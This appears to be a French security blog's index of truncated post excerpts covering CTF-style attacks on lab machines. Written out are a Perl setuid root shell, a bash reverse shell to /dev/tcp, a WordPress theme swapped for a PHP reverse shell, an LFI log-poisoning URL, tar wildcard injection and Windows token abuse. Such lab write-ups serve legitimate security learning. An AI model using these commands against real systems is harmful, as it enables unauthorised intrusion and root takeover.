Il est possible de prendre possession d’un ActiveDiectory si nous réussissons à cracker le mot de passe de l’administrateur. On commence par énumérer les services présents sur le AD r0cker@kali:~$ sudo nmap -p- -A -nP 10.10.74.213 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 07:17 EDT Nmap scan report for 10.10.74.213 Host is up (0.086s … Continuer la lecture
Voilà un astuce en exécutant le script linpeas, vous remarque que perl apparaît avec les “capabilities”: cap_setuid+ep set vous pouvez obtenir un shell root perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' Vous pouvez aussi donner à Perl cette capacité: cp $(which perl) . sudo setcap cap_setuid+ep perl ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec … Continuer la lecture
Il existe quelques exploits populaires pour Windows server. Entre autres, Rotten Potato et PrintSpooler. Voici une introduction brève pour l’export PrintSpooler Si vous avez les droits SeImersonatePrivilege ou SeAssignPrimaryTokenPrivilege, vous devriez pouvoir exploiter Windows et obtenir les droits AUTHORITY\SYSTEM whoami /priv PRIVILEGES INFORMATION ———————- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level … Continuer la lecture
On modifie le fichier 404.php du thème par le php-reverse-shell.php (on édite l’adresse IP et le port de la machine de l’attaquant, sinon il faudra POSTer ces variables) On pet par la suite y accéder https://10.10.251.62/wp-content/themes/twentyfifteen/404.php
Nous pouvons voir que nous sommes dans un docker en allant dans /opt/backups Nous pouvons sortir en écrasant backup.sh echo “#!/bin/bash” > backup.sh echo “/bin/bash -c ‘bash -i >& /dev/tcp//1234 0>&1′” >> backup.sh Il existe aussi des scripts d’énumération des dockers Voir la vulnérabilité CVE-2019-14271 parfois nous pouvons nous connecter à un serveur docker à … Continuer la lecture
Lorsque qu’un programme s’exécute avec les droits du propriétaire (SUID), il est peut être possible de modifier le chemin d’accès PATH pour que celui exécute autre chose que ce qui était prévu au départ r0cker@ubuntu:~/secret$ ls -lsa ls -lsa total 40 4 drwxrwx— 2 r0cker r0cker 4096 Jun 27 05:29 . 4 drwxr-xr-x 6 r0cker r0cker 4096 … Continuer la lecture
Cette technique d’infiltration se résume à exécuter une commande et à lire le résultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http://www.vulnerable.com/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=ls On remarquera qu’ici le serveur est vulnérable à l’inclusion local de fichier (LFI) et que le script filtre les requêtes avec “../..” et c’est la raison pour … Continuer la lecture
Si on veut déterminer le type de hash à cracker, on se réfère à https://hashcat.net/wiki/doku.php?id=example_hashes. On trouve le hash mode dans la liste. hashcat -m 1600 hash rockyou.txt
Rlwrap est un petit utilitaire qui s’intégre à d’autres outils qui utilisent readline. Son but est de permettre l’édition avant l’envoi au serveur et permettre aussi de conserver une historique. Voici comment on peut l’utiliser simplement: rlwrap nc -nlvp 4444
Lorsqu’on utilise le caractère * dans une commande shell, celui-ci signifie “tous les fichiers” Lorsqu’on administrateur utilise une commande tar (ou possiblement d’autres), il faut faire attention, car il y a des options pour obtenir un shell listés suf gtfobins –checkpoint=1 –checkpoint-action=exec=/bin/sh Donc en créant ces fichiers et un fichier de commandes dans le répertoire … Continuer la lecture